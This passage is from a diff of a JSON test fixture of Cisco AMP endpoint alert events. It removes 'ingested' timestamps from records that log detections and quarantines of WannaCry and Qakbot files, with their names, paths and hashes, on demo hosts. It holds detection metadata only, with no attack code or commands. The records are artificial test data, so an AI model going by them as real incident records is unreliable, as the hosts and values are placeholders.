Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "severity": 2 @@ -147,7 +146,6 @@ ], "code": "2164260880", "id": "6419275390665097000", - "ingested": "2022-02-02T05:53:05.376858237Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":862000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -223,7 +221,6 @@ ], "code": "2164260880", "id": "6419275390665097000", - "ingested": "2022-02-02T05:53:05.376859420Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":659000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -297,7 +294,6 @@ ], "code": "1090519054", "id": "6419275390665097000", - "ingested": "2022-02-02T05:53:05.376860672Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":831000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -387,7 +383,6 @@ ], "code": "1090519054", "id": "6419275390665097000", - "ingested": "2022-02-02T05:53:05.376861794Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":706000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 @@ -490,7 +485,6 @@ ], "code": "1090519054", "id": "6419275390665097000", - "ingested": "2022-02-02T05:53:05.376862869Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 @@ -587,7 +581,6 @@ ], "code": "553648143", "id": "6419275390665097000", - "ingested": "2022-02-02T05:53:05.376864016Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -663,7 +656,6 @@ ], "code": "2164260880", "id": "6411525251028484000", - "ingested": "2022-02-02T05:53:05.376865068Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "severity": 2 @@ -737,7 +729,6 @@ ], "code": "1090519054", "id": "6411525251028484000", - "ingested": "2022-02-02T05:53:05.376866209Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":214000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "severity": 2 @@ -827,7 +818,6 @@ ], "code": "1090519054", "id": "6411525251028484000", - "ingested": "2022-02-02T05:53:05.376867257Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "severity": 2 @@ -915,7 +905,6 @@ ], "code": "553648143", "id": "6411525251028484000", - "ingested": "2022-02-02T05:53:05.376868373Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "severity": 2 @@ -991,7 +980,6 @@ ], "code": "2164260893", "id": "6419264043361501000", - "ingested": "2022-02-02T05:53:05.376869692Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 3 @@ -1067,7 +1055,6 @@ ], "code": "2164260893", "id": "6419264043361501000", - "ingested": "2022-02-02T05:53:05.376870829Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 3 @@ -1143,7 +1130,6 @@ ], "code": "2164260893", "id": "6419264043361501000", - "ingested": "2022-02-02T05:53:05.376871917Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 3 @@ -1215,7 +1201,6 @@ ], "code": "553648155", "id": "6419264043361501000", - "ingested": "2022-02-02T05:53:05.376872988Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 3 @@ -1289,7 +1274,6 @@ ], "code": "553648147", "id": "6419264043361501000", - "ingested": "2022-02-02T05:53:05.376874034Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 3 @@ -1369,7 +1353,6 @@ ], "code": "553648147", "id": "6419264043361501000", - "ingested": "2022-02-02T05:53:05.376875147Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"}}}}", "severity": 3 @@ -1453,7 +1436,6 @@ ], "code": "553648147", "id": "6419264043361501000", - "ingested": "2022-02-02T05:53:05.376876227Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":763000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective 